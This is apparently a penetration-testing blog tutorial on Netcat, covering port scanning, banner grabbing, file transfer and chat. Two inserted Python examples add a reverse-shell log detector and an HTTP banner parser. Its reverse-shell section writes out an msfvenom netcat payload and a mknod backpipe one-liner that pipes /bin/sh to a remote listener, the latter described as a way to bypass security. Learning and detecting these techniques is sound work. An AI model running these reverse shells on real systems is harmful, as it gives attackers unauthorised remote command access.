Netcat techniques for penetration testers

Hacking Truth


After a long time we are back, yes! We are back, and now we have brought you a new blog post about Netcat for penetration testers and others. Netcat, technically used as "nc", is a network utility that uses TCP and UDP connections to read from and write to a network. It can be used by security auditors and by attackers; it depends on the purpose you want to use Netcat for.

It acts as a simple TCP/UDP/SCTP/SSL client for interacting with web servers, telnet servers, mail servers, and other TCP/IP network services.



Netcat Basic Command


Help, or sometimes just "h": this single letter prints every option the tool offers. So let's start with our first command, the help command.


nc -h 






Port Scanning


Now we will look at port scanning with Netcat, although it was not designed to function as a scanner. To make it work as one, we set the "-z" flag, which tells Netcat to probe for listening daemons without sending any data. This makes it possible to find out which services are running on specific ports.


nc -v -n -z 192.168.19.100 21-100 


[-v] - verbose mode

[-n] - numeric-only, no DNS lookups

[-z] - zero-I/O mode: report listening ports without sending data

The IP address may differ; put in the IP of your own test system.






Chatting


Netcat can also be used to chat between two users, but first we need to establish the connection. To set this up we'll use two sides: one plays the role of the initiator and the other is the listener.

You can have two different users' operating systems communicate with each other over a Netcat connection within the same network, but this time we will be using two terminals on the same system.


nc -lvp 4444


Here,

[-l] - listen mode

[-v] - verbose mode

[-p] - local port


Now it's time to set up the initiator.


nc 192.168.19.100 4444


Below you can see that the connection has been set up and both sides are now able to communicate with each other.





Banner Grabbing


A banner is the text message received from a host, giving information about the open port and the service behind it, often with its version number.

Run the following command to grab that information:


nc 192.168.19.100 22






File Transfer






Netcat gives us a way to transfer files from one device to another over a network. Let's follow a scenario where a Kali user wants to transfer a file to a user on another Linux machine.

In the image and command below, the Kali machine sets up a listener on port 4444 and serves fileone.txt through the "<" redirection.


nc -lvp 4444 < fileone.txt




The Linux user connects to that port and redirects Netcat's output into a local file, and you can see that fileone.txt has been successfully grabbed from 192.168.19.100, which is nothing but the Kali user's IP.



Linux Reverse Shell


As discussed earlier, Netcat can do almost anything, so now we will exploit the target machine: we use "msfvenom" to create a payload and set up a Netcat listener to catch the session.


msfvenom -p cmd/unix/reverse_netcat lhost=192.168.19.100 lport=4444 R


The "R" flag generates a raw payload, which is printed on our screen.




From the above image you can see that our payload is ready. Now it's time to trigger it on the victim's server.

Open another machine if you have one; otherwise use another terminal on the same machine, and type the payload in there. Before firing it up, go back to the attacker's machine (Kali Linux) and set up the Netcat listener there, using the same port number you used when generating the payload.



From the below image you can see that, as soon as the victim runs the payload, we get the session.

There are many times when the security is tighter and we fail to grab the session using this method, but there is another way to get a reverse shell.

Before that, set up a listener on port 443.




Once the listener is up, execute the following commands on the target machine. This helps bypass the security and gives you a Netcat session:

mknod /tmp/backpipe p


/bin/sh 0</tmp/backpipe | nc 192.168.19.100 4444  1>/tmp/backpipe
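The defender's side of the two reverse-shell variants above, as an added example that is not from the original post: a small Python detector that classifies logged command lines (the constructed sample reuses the post's own commands) and escalates when the FIFO creation and the shell-to-nc bridge are seen close together. The log format, rule names and severities are assumptions.

```python
import re
# Constructed sample: shell commands as an execve/auditd-style log might record them.
SAMPLE_LOG = """\
mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc 192.168.19.100 4444 1>/tmp/backpipe
nc -lvp 4444 < fileone.txt
nc -v -n -z 192.168.19.100 21-100
printf "GET / HTTP/1.0\\r\\n\\r\\n" | nc 192.168.19.100 80
"""
NC = r"\b(?:nc|ncat|netcat)\b"
FIFO_CREATE = re.compile(r"\b(?:mkfifo\s+(\S+)|mknod\s+(\S+)\s+p\b)")
NC_LISTEN = re.compile(NC + r"\s+(?:-\S+\s+)*-\S*l")  # -l anywhere in the flags
NC_CONNECT = re.compile(NC + r"\s+(?:-\S+\s+)*(?!-)([\w.:-]+)\s+(\d{1,5})\b")
SHELL = re.compile(r"(?:^|[\s|;&])(?:/usr)?(?:/bin/)?(?:ba|da|z)?sh\b")
REDIRECT = re.compile(r"[<>]\s*(/\S+)")  # absolute paths used in redirections

def classify(line):
    """Return a finding dict for one logged command line, or None if nothing matches."""
    if m := FIFO_CREATE.search(line):
        return {"severity": "medium", "rule": "fifo_created", "path": m.group(1) or m.group(2)}
    if NC_LISTEN.search(line):
        return {"severity": "medium", "rule": "nc_listener"}
    if not (m := NC_CONNECT.search(line)):
        return None
    f = {"peer": f"{m.group(1)}:{m.group(2)}"}
    if SHELL.search(line):
        paths = REDIRECT.findall(line)
        # Shell stdin and nc stdout on one path: the backpipe bridge, a shell wired to a socket.
        if len(paths) >= 2 and len(set(paths)) == 1:
            return {**f, "severity": "high", "rule": "shell_bridged_via_fifo", "path": paths[0]}
        return {**f, "severity": "high", "rule": "shell_piped_to_nc"}
    if re.search(r"\s-\w*z", line):  # nc -z, the zero-I/O scan mode from the post
        return {**f, "severity": "medium", "rule": "nc_zero_io_scan"}
    return {**f, "severity": "low", "rule": "nc_outbound"}

def scan_log(text, window=10):
    """Classify each line; escalate a bridge whose FIFO was created within `window` lines."""
    findings, fifos = [], {}
    for n, line in enumerate(text.splitlines(), 1):
        if (hit := classify(line)) is None:
            continue
        hit["line"] = n
        if hit["rule"] == "fifo_created":
            fifos[hit["path"]] = n
        elif hit["rule"] == "shell_bridged_via_fifo" and fifos.get(hit["path"], -window) >= n - window:
            hit["severity"] = "critical"  # both halves of the backpipe reverse shell observed
        findings.append(hit)
    return findings
```

The listener and plain outbound rules will also fire on the chat, file-transfer and banner-grab commands from this post, which is the point: on a production host none of them should be routine.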






Randomized Port


There are times when we can't settle on a port for a listener or for a Netcat connection. Netcat has a special "-r" flag that gives us a randomized local port.


nc -lv -r




From the above image you can see that our listener has started on port 45811.



Grabbing the HTTP Banner


HTTP banners can no longer be fetched easily, as they contain the server's information, but we can use Netcat to capture information about any web server.

Simply run the following command to query the target server and check what we have grabbed.


printf "GET / HTTP/1.0\r\n\r\n" | nc 192.168.19.100 80 






Great! From the above image you can see that I've successfully captured the HTTP banner, and we are presented with the Apache server.
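An added example, not from the original post, of what to do with the bytes nc prints back after that request: parse the status line and headers and pick out the software-disclosing headers a banner grab is after. The sample response is constructed and the Apache and PHP version strings in it are made up.

```python
# Constructed sample response in the shape nc prints back after the post's
# "GET / HTTP/1.0" request; the Server and X-Powered-By values are made up.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Mon, 01 Jan 2024 00:00:00 GMT\r\n"
    b"Server: Apache/2.4.99 (Debian)\r\n"
    b"X-Powered-By: PHP/8.9\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<html><body>hello</body></html>\r\n"
)

# Headers that disclose software names and versions: what a banner grab is after.
DISCLOSING_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-generator")


def parse_response(raw):
    """Split a raw HTTP response into version, status, a header map and the body.

    Tolerates bare-LF servers, duplicate headers (joined with ', '), junk header
    lines, and HTTP/0.9-style replies that carry no status line at all.
    """
    sep = b"\r\n\r\n" if b"\r\n\r\n" in raw else b"\n\n"
    head, _, body = raw.partition(sep)
    lines = head.decode("latin-1").splitlines()
    if not lines or not lines[0].startswith("HTTP/"):
        return {"version": None, "status": None, "headers": {}, "body": raw}
    parts = lines[0].split(" ", 2)
    status = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else None
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if not colon:
            continue  # skip malformed lines rather than failing the whole parse
        key, value = name.strip().lower(), value.strip()
        headers[key] = f"{headers[key]}, {value}" if key in headers else value
    return {"version": parts[0], "status": status, "headers": headers, "body": body}


def banner(parsed):
    """Keep only the headers that reveal server software, e.g. the Apache line from the post."""
    return {k: v for k, v in parsed["headers"].items() if k in DISCLOSING_HEADERS}
```

On your own servers, an empty result from banner() is what you want to see; each key it returns is a version string handed to anyone who sends that one-line request.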



 

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources; they do not involve any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of this information and we strongly advise against it. Please read the word hacking as ethical hacking or penetration testing every time it is used. We do not promote, encourage, support or incite any illegal activity or hacking.

 

 
